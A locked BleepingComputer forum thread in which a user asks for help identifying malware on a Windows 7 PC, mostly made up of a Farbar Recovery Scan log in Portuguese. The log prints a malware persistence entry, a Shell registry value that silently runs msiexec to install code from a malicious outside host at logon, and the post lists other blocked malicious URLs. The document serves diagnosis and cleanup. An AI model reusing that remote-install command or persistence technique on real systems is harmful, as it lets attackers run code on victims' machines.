Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

What malware is this? How can i solve this FAST?


  • This topic is locked This topic is locked
2 replies to this topic

#1 IDFs0ldier

IDFs0ldier

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:11:03 PM

Posted 13 April 2017 - 09:58 AM

Since yesterday i am trying to figure out what is this virus on my pc, i was watching youtube videos when poped up an avast window blocking an URL called http//point.rwmdqsj.com/Sc2_jt70411.msi.dat and the process was C:\Windows\System32\msiexec.exe exactly at 1:20 PM, then, at 2:01 PM  another Avast pop up blocking an URL called  http//point.lotusiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF==, and this Avast block always happens exactly 3 hours after of a detection, i ran the Farbar Recovery Scan Tool, the interesting part of the log is the HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q, and here is my FRST log:

 

Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão: 15-03-2017
Executado por Biel (administrador) em BIEL-PC (12-04-2017 18:32:35)
Executando a partir de C:\Users\Biel\Documents\EGDownloads
Perfis Carregados: Biel (Perfis Disponíveis: Biel)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Idioma: Português (Brasil)
Internet Explorer Versão 8 (Navegador padrão: Chrome)
Modo da Inicialização: Normal
 
==================== Processos (Whitelisted) =================
 
(Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(GAS Tecnologia) C:\Program Files (x86)\GbPlugin\GbpSv.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(GAS Tecnologia LTDA) C:\Program Files\Diebold\Warsaw\core.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(Disc Soft Ltd) C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(GAS Tecnologia) C:\Program Files (x86)\GbPlugin\GbpSv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(IObit) C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallMonitor.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Registro (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8468184 2015-05-22] (Realtek Semiconductor)
HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [112512 2010-03-13] (Microsoft Corporation)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Diebold - Warsaw] => C:\Program Files\Diebold\Warsaw\core.exe [925744 2016-06-23] (GAS Tecnologia LTDA)
HKLM\...\Run: [ShadowPlay] => "C:\Windows\system32\rundll32.exe" C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-04-04] (AVAST Software)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [35736 2010-11-15] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [932288 2010-11-15] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-12-12] (Oracle Corporation)
Winlogon\Notify\ GbPluginCef: C:\Program Files (x86)\GbPlugin\gbiehCef.dll [2016-08-10] (Caixa Economica Federal)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files\DAEMON Tools Lite\DTLite.exe [5583120 2015-02-27] (Disc Soft Ltd)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [Google Update] => C:\Users\Biel\AppData\Local\Google\Update\1.3.33.3\GoogleUpdateCore.exe [599632 2017-04-11] (Google Inc.)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-22] (Valve Corporation)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [eagleget_setup] => C:\Users\Biel\AppData\Local\Temp\is-KE1NB.tmp\eagleget_setup.tmp -V <===== ATENÇÃO
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9292504 2016-12-21] (Piriform Ltd)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Run: [uTorrent] => C:\Users\Biel\AppData\Roaming\uTorrent\uTorrent.exe [2144448 2017-04-08] (BitTorrent Inc.)
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDQkEGRhnANcOTHcGdzkMTqyMWHcOWw5MF== /q
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: F - F:\Lenovo_Suite.exe
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {9836347d-9e45-11e6-bc16-08626698bb3b} - F:\Lenovo_Suite.exe
HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\...\MountPoints2: {b740cf12-9ef6-11e6-a699-08626698bb3b} - F:\setup.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2016-10-30] (Microsoft Corporation)
IFEO\taskmgr.exe: [Debugger] 
ShellExecuteHooks-x32: GbPluginObj Class - {E37CB5F0-51F5-4395-A808-5FA49E399003} - C:\Program Files (x86)\GbPlugin\gbiehcef.dll [1903328 2016-08-10] (Caixa Economica Federal)
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2017-04-04] (AVAST Software)
GroupPolicy: Restrição <======= ATENÇÃO
 
==================== Internet (Whitelisted) ====================
 
(Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou restaurado para o padrão.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{3C0BA5A4-FB7E-43F7-8993-B26A0F015ACA}: [DhcpNameServer] 172.20.24.1
Tcpip\..\Interfaces\{A397355B-4ACA-4437-B07E-F74451774240}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{C3A99120-ADBC-444D-A22C-B942A8B3C1F3}: [DhcpNameServer] 192.168.0.1
 
Internet Explorer:
==================
SearchScopes: HKU\S-1-5-21-2097341823-3435128210-3467763070-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer.dll [2016-05-23] (IObit)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_121\bin\ssv.dll [2017-01-18] (Oracle Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-04-04] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_121\bin\jp2ssv.dll [2017-01-18] (Oracle Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15] (Adobe Systems Incorporated)
BHO-x32: EGet Class -> {1E871FF8-029C-4732-8AA7-39E3D3872057} -> C:\Program Files (x86)\EagleGet\eagleSniffer.dll [2016-12-22] (EagleGet.com)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-04-04] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
BHO-x32: GbIehObj Class -> {C41A1C0E-EA6C-11D4-B1B8-444553540003} -> C:\Program Files (x86)\GbPlugin\gbiehcef.dll [2016-08-10] (Caixa Economica Federal)
Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2010-11-20] (Microsoft Corporation)
Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2010-11-20] (Microsoft Corporation)
 
FireFox:
========
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2017-01-08]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2017-01-08]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_25_0_0_148.dll [2017-04-11] ()
FF Plugin: @java.com/DTPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\dtplugin\npDeployJava1.dll [2017-01-18] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.121.2 -> C:\Program Files\Java\jre1.8.0_121\bin\plugin2\npjp2.dll [2017-01-18] (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-11] ()
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-12-16] (NVIDIA Corporation)
FF Plugin-x32: @raidcall.en/RCplugin -> C:\Users\Biel\AppData\Roaming\raidcall\plugins\nprcplugin.dll [2015-03-17] (Raidcall)
FF Plugin HKU\S-1-5-21-2097341823-3435128210-3467763070-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Biel\AppData\Local\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin HKU\S-1-5-21-2097341823-3435128210-3467763070-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Biel\AppData\Local\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-11] (Google Inc.)
FF Plugin HKU\S-1-5-21-2097341823-3435128210-3467763070-1000: eagleget.com/EagleGet32 -> C:\Program Files (x86)\EagleGet\npEagleget.dll [2016-08-01] (EagleGet)
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://google.com.br/"
CHR Profile: C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default [2017-04-12]
CHR Extension: (Google Apresentações) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-29]
CHR Extension: (Google Docs) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-29]
CHR Extension: (Google Drive) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-29]
CHR Extension: (YouTube) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-29]
CHR Extension: (Planilhas do Google) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-29]
CHR Extension: (Documentos Google off-line) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-29]
CHR Extension: (AdBlock) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-04-12]
CHR Extension: (Avast Online Security) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2017-04-05]
CHR Extension: (EagleGet Free Downloader) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\kaebhgioafceeldhgjmendlfhbfjefmo [2017-03-24]
CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-08]
CHR Extension: (Gmail) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-10-29]
CHR Extension: (Chrome Media Router) - C:\Users\Biel\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-04]
CHR HKLM\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx [2017-01-06]
CHR HKU\S-1-5-21-2097341823-3435128210-3467763070-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx [2017-01-06]
CHR HKLM-x32\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx [2017-01-06]
StartMenuInternet: Google Chrome.BWR34HAGIGSXURE7TPOEEQTOZU - C:\Users\Biel\AppData\Local\Google\Chrome\Application\chrome.exe
 
==================== Serviços (Whitelisted) ====================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7398336 2017-04-04] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [261712 2017-04-04] (AVAST Software)
R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1272592 2015-02-27] (Disc Soft Ltd)
S2 egGetSvc; C:\Program Files (x86)\EagleGet\EGMonitor.exe [247464 2016-12-22] ()
R2 GbpSv; C:\Program Files (x86)\GbPlugin\GbpSv.exe [631520 2016-08-10] (GAS Tecnologia)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [317640 2015-03-30] (Intel Corporation)
S2 IObitUnSvr; C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe [360736 2016-10-28] (IObit)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-23] (NVIDIA Corporation)
R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-23] (NVIDIA Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
R2 Warsaw Technology; C:\Program Files\Diebold\Warsaw\core.exe [925744 2016-06-23] (GAS Tecnologia LTDA)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [307736 2017-04-04] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [189768 2017-04-04] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334088 2017-04-04] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [48528 2017-04-04] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-04-04] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-04-04] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [127112 2017-04-04] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-04-04] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-04-04] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1005048 2017-04-04] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [556784 2017-04-04] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [164064 2017-04-04] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-04-04] (AVAST Software)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30352 2016-10-29] (Disc Soft Ltd)
S3 eagleGet; C:\Windows\System32\Drivers\eagleGet.sys [79024 2016-10-11] (eagleGet) [Arquivo não assinado]
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-03-24] ()
R3 GBPRCM; C:\Program Files (x86)\GbPlugin\gbprcm64.sys [29912 2016-08-10] (GAS Tecnologia)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2014-04-24] (Intel Corporation)
R3 int0800; C:\Windows\System32\DRIVERS\flashud.sys [51712 2009-09-09] (Intel Corporation)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [186304 2017-04-12] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [111544 2017-04-12] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [43968 2017-04-12] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [251832 2017-04-12] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [82720 2017-04-12] (Malwarebytes)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [27584 2017-02-23] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [47672 2017-01-20] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [59448 2017-01-20] (NVIDIA Corporation)
R3 Warsaw_PP; C:\Program Files (x86)\GbPlugin\wsftprp64.sys [24792 2016-08-10] (GAS Tecnologia LTDA)
S3 wsddfac; C:\Windows\System32\drivers\wsddfac.sys [101080 2017-04-12] (GAS Tecnologia)
R1 wsddpp; C:\Windows\system32\drivers\wsddpp.sys [97376 2016-06-08] (GAS Tecnologia)
S1 gbpddfac; system32\drivers\gbpddfac64.sys [X]
S0 gbpddreg; system32\drivers\gbpddreg64.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
 
==================== Um Mês Criados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-04-12 18:32 - 2017-04-12 18:32 - 00000000 ____D C:\FRST
2017-04-12 18:30 - 2017-04-12 18:30 - 00000000 ____D C:\Users\Todos os Usuários\SWCUTemp
2017-04-12 18:30 - 2017-04-12 18:30 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-04-12 13:44 - 2017-04-12 17:45 - 00082720 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00186304 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00111544 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-04-12 13:44 - 2017-04-12 15:41 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-04-12 13:44 - 2017-04-12 13:44 - 00001867 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\Users\Todos os Usuários\Malwarebytes
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-04-12 13:44 - 2017-04-12 13:44 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-12 13:44 - 2017-03-24 04:10 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-04-11 14:03 - 2017-04-11 14:03 - 00000000 ___HD C:\$AV_ASW
2017-04-11 13:20 - 2017-04-11 13:20 - 00000000 ____D C:\Users\Biel\AppData\Roaming\SSMgre
2017-04-10 08:11 - 2017-04-10 08:11 - 00003552 _____ C:\Windows\System32\Tasks\PowerWord-SCT-JT
2017-04-07 18:03 - 2017-04-09 20:25 - 00000000 ____D C:\Users\Biel\AppData\Roaming\.minecraft
2017-04-04 18:42 - 2017-04-04 18:42 - 00399944 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-04-04 18:42 - 2017-04-04 18:42 - 00334088 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00307736 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00189768 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00048528 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-04-04 18:42 - 2017-04-04 18:42 - 00003914 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-03-25 18:50 - 2017-03-25 18:50 - 00000000 ____D C:\Users\Todos os Usuários\Caphyon
2017-03-25 18:50 - 2017-03-25 18:50 - 00000000 ____D C:\ProgramData\Caphyon
2017-03-25 18:34 - 2017-03-25 18:34 - 00000000 ____D C:\Users\Biel\AppData\Roaming\Warzone
2017-03-24 16:01 - 2017-03-24 16:01 - 00000082 _____ C:\Users\Biel\Documents\cc_20170324_160126.reg
2017-03-24 16:00 - 2017-03-24 16:00 - 00000082 _____ C:\Users\Biel\Documents\cc_20170324_160041.reg
2017-03-15 15:01 - 2017-03-15 20:17 - 00450803 _____ C:\Users\Biel\Documents\lol.pptx
2017-03-15 14:37 - 2017-03-15 14:37 - 00000000 ___RD C:\Program Files (x86)\Skype
2017-03-15 14:37 - 2017-03-15 14:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
 
==================== Um Mês Modificados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
